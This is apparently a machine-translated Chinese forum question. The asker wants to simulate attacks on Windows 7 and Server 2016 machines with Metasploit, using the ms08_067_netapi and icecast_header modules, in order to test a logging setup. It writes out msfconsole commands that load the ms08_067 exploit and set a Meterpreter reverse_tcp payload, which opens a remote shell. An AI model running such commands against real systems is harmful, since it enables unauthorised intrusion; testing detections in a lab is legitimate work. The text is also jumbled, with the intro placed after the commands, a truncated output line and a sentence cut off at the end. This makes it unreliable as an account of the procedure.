然后,我将新文件复制到/root/.msf4/modules/exploits/windows/smb和/usr/share/metasploit-framework/modules/windows/smb中,并发出reload_all命令并重新启动msfconsole,但无论我如何尝试,它仍然显示:
msf > use exploits/windows/smb
例子-msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi)>
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows
为了测试日志解决方案的目的,我想通过使用Metasploit来模拟针对Windows 7/ Windows 2016服务器的攻击。但是,我很难找到一个可靠的漏洞,它实际上会在受害者机器上产生根外壳。最初,我试图确定一个可靠的MSF模块,以便在攻击过程中使用。我选择了windows/http/icecast_header,因为它似乎或多或少独立于底层操作系统版本(Win 7 vs. 2016)。因此,我在受害者计算机上安装了易受攻击的Icecast版本,并配置了MSF模块。因此